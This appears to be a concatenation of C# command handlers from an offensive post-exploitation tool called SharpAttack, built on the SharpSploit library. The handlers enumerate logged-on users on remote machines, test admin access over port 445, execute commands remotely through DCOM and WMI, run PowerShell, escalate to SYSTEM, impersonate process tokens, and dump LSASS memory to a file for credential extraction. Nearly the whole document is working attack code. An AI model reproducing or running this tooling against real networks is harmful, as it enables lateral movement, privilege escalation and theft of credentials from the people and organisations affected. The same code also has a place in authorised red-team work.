public override void Run(Dictionary <String, Parameter> RunParams)
{
if (RunParams.TryGetValue("Command", out Parameter command))
{
Command cmd = null;
try
{
cmd = SharpAttack.AvailableCommands[command.Value[0]];
Printing.TableHeader(command.Value[0], cmd.Helptext, "Parameter", "Description");
foreach (KeyValuePair <string, Parameter> parm in cmd.Parameters)
{
Printing.TableItem($"-{parm.Key}", parm.Value.HelpText);
}
}
catch
{
Printing.Error($"No command found named: {command.Value[0]}");
}
}
else
{
Printing.TableHeader("SharpAttack Commands", "Here are the commands available to you", "Command", "Description");
foreach (KeyValuePair <string, Command> cmd in SharpAttack.AvailableCommands)
{
Printing.TableItem(cmd.Key, cmd.Value.Helptext);
}
}
}
public override void Run(Dictionary <String, Parameter> RunParams)
{
List <string> targets = Proccessing.GetTargets(RunParams);
if (targets.Count > 0)
{
foreach (string target in targets)
{
string computer = target;
try
{
if (computer == null)
{
computer = "localhost";
}
List <string> printedUsers = new List <string>();
List <Net.LoggedOnUser> users = Net.GetNetLoggedOnUsers(computer);
Printing.CmdOutputHeading($"Logged on users for {computer}");
foreach (Net.LoggedOnUser user in users)
{
if (!user.UserName.EndsWith("$") && !printedUsers.Contains(user.UserName))
{
Printing.CmdOutputItem($"User {user.UserName} is logged in from {user.ComputerName}");
printedUsers.Add(user.UserName);
}
}
}
catch
{
Printing.Error($"Could not get logged on users for {computer}");
}
}
}
}
public override void Run(Dictionary <String, Parameter> RunParams)
{
List <string> targets = Proccessing.GetTargets(RunParams);
if (targets.Count > 0)
{
SharpSploitResultList <Network.PortScanResult> scan = Network.PortScan(targets, 445, true);
foreach (Network.PortScanResult scanResult in scan)
{
if (scanResult.IsOpen)
{
ServiceController serviceController = new ServiceController("Spooler", scanResult.ComputerName); try
{
serviceController.ServiceHandle.Close();
Printing.Success($"Admin access to {scanResult.ComputerName}");
}
catch
{
Printing.Error($"No access to {scanResult.ComputerName}");
}
}
else
{
Printing.Error($"Port {scanResult.Port} is not open on {scanResult.ComputerName}");
}
}
}
else
{
Printing.Error("Need to specify a ComputerName or IPAddress");
}
}
public override void Run(Dictionary <String, Parameter> RunParams)
{
string Parameters = null;
DCOM.DCOMMethod Method = DCOM.DCOMMethod.MMC20_Application;
if (RunParams.TryGetValue("Parameters", out Parameter parameters))
{
Parameters = parameters.Value[0];
}
if (RunParams.TryGetValue("Method", out Parameter method))
{
string value = method.Value[0];
switch (value)
{
case "MMC20":
Method = DCOM.DCOMMethod.MMC20_Application;
break;
case "ShellWindow":
Method = DCOM.DCOMMethod.ShellWindows;
break;
case "ShellBrowserWindow":
Method = DCOM.DCOMMethod.ShellBrowserWindow;
break;
case "ExcelDDE":
Method = DCOM.DCOMMethod.ExcelDDE;
break;
default:
Printing.Error($"{value} is not a valid method");
break;
}
}
if (RunParams.TryGetValue("ComputerName", out Parameter computer))
{
if (RunParams.TryGetValue("Command", out Parameter command))
{
foreach (string cmd in command.Value)
{
DCOM.DCOMExecute(computer.Value, cmd, Parameters, null, Method);
}
}
else
{
Printing.Error("No command specified");
}
}
else
{
Printing.Error("No Computer Name specified.");
}
}
public override void Run(Dictionary <String, Parameter> RunParams)
{
if (tokens.RevertToSelf())
{
Printing.Success("Successfully reverted to self");
}
else
{
Printing.Error("Failed to revert to self. We're stuck forever.");
}
}
public override void Run(Dictionary <String, Parameter> RunParams)
{
if (tokens.GetSystem())
{
Printing.Success("Successfully became SYSTEM");
}
else
{
Printing.Error("Failed to get SYSTEM");
}
}
public override void Run(Dictionary <String, Parameter> RunParams)
{
if (RunParams.TryGetValue("Command", out Parameter command))
{
foreach (string cmd in command.Value)
{
Printing.CmdOutput(Shell.PowerShellExecute(cmd));
}
}
else
{
Printing.Error("No command specified");
}
}
public override void Run(Dictionary <String, Parameter> RunParams)
{
int id = -1;
string OutputPath = Host.GetCurrentDirectory();
string OutputName = "output.bin";
if (RunParams.TryGetValue("PID", out Parameter pid))
{
id = int.Parse(pid.Value[0]);
}
if (RunParams.TryGetValue("OutputPath", out Parameter outpath))
{
OutputPath = outpath.Value[0];
}
if (RunParams.TryGetValue("OutputName", out Parameter outname))
{
OutputName = outname.Value[0];
}
if (id < 0)
{
try
{
Host.CreateProcessDump("lsass", OutputPath, OutputName);
Printing.Success($"Dump created at {OutputPath}\\{OutputName}");
}
catch
{
Printing.Error($"Error creating process dump.");
}
}
else
{
try
{
Host.CreateProcessDump(id, OutputPath, OutputName);
Printing.Success($"Dump created at {OutputPath}\\{OutputName}");
}
catch
{
Printing.Error($"Error creating process dump.");
}
}
}
public override void Run(Dictionary <String, Parameter> RunParams)
{
if (RunParams.TryGetValue("ComputerName", out Parameter computer))
{
if (RunParams.TryGetValue("Command", out Parameter command))
{
foreach (string cmd in command.Value)
{
WMI.WMIExecute(computer.Value, cmd, null, null);
}
}
else
{
Printing.Error("No command specified");
}
}
}
public override void Run(Dictionary <String, Parameter> RunParams)
{
if (RunParams.TryGetValue("PID", out Parameter pid))
{
UInt32 id = Convert.ToUInt32(pid.Value[0]);
Tokens tokens = new Tokens();
if (tokens.ImpersonateProcess(id))
{
Printing.Success("Successfully impersonated process.");
}
else
{
Printing.Error("Failed to impersonate process");
}
}
else
{
Printing.Error("No PID specified");
}
}
